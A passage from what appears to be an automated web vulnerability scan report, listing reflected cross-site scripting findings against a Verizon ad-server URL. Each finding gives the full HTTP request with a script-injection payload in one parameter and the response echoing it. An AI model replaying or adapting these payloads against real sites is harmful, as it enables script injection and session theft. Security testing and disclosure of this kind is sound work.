GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=862d1"><script>alert(1)</script>ce12940af71&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:56:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
tate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=862d1"><script>alert(1)</script>ce12940af71&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.70. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [pws parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the pws request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98a25"><script>alert(1)</script>030f87d661d was submitted in the pws parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=98a25"><script>alert(1)</script>030f87d661d&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:54:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
8326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=98a25"><script>alert(1)</script>030f87d661d&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.71. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [search parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55331"><script>alert(1)</script>3099bd94315 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=55331"><script>alert(1)</script>3099bd94315 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:58:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=55331"><script>alert(1)</script>3099bd94315" target="_top">
...[SNIP]...

3.72. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [sec_email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the sec_email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a8c"><script>alert(1)</script>afe03052625 was submitted in the sec_email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=a3a8c"><script>alert(1)</script>afe03052625&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:56:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
y=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=a3a8c"><script>alert(1)</script>afe03052625&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.73. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [smb_enh_msg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the smb_enh_msg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98904"><script>alert(1)</script>6476ec4b36d was submitted in the smb_enh_msg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=98904"><script>alert(1)</script>6476ec4b36d&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:57:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=98904"><script>alert(1)</script>6476ec4b36d&webex=&search=" target="_top">
...[SNIP]...

3.74. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [smb_premmail parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the smb_premmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd524"><script>alert(1)</script>db31b89a21 was submitted in the smb_premmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=bd524"><script>alert(1)</script>db31b89a21&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:55:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1358
Content-Type: text/html
Cache-Control: private
Content-Length: 1358

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=bd524"><script>alert(1)</script>db31b89a21&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.75. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [usertype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the usertype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c3a7"><script>alert(1)</script>6769bca969e was submitted in the usertype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer1c3a7"><script>alert(1)</script>6769bca969e&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:52:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
sur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer1c3a7"><script>alert(1)</script>6769bca969e&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target=
...[SNIP]...

3.76. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vasonly parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the vasonly request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6da1a"><script>alert(1)</script>d0153c69ecc was submitted in the vasonly parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=6da1a"><script>alert(1)</script>d0153c69ecc&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:53:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=6da1a"><script>alert(1)</script>d0153c69ecc&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.77. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vgodfamily parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the vgodfamily request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59812"><script>alert(1)</script>b6620b35637 was submitted in the vgodfamily parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=59812"><script>alert(1)</script>b6620b35637&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:55:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
1693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=59812"><script>alert(1)</script>b6620b35637&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.78. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [vgodunlim parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the vgodunlim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e095"><script>alert(1)</script>1f394cc321d was submitted in the vgodunlim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=3e095"><script>alert(1)</script>1f394cc321d&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:55:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=3e095"><script>alert(1)</script>1f394cc321d&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

3.79. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [viss parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the viss request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff424"><script>alert(1)</script>ef31f985b3 was submitted in the viss parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=ff424"><script>alert(1)</script>ef31f985b3&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:54:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=ff424"><script>alert(1)</script>ef31f985b3&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

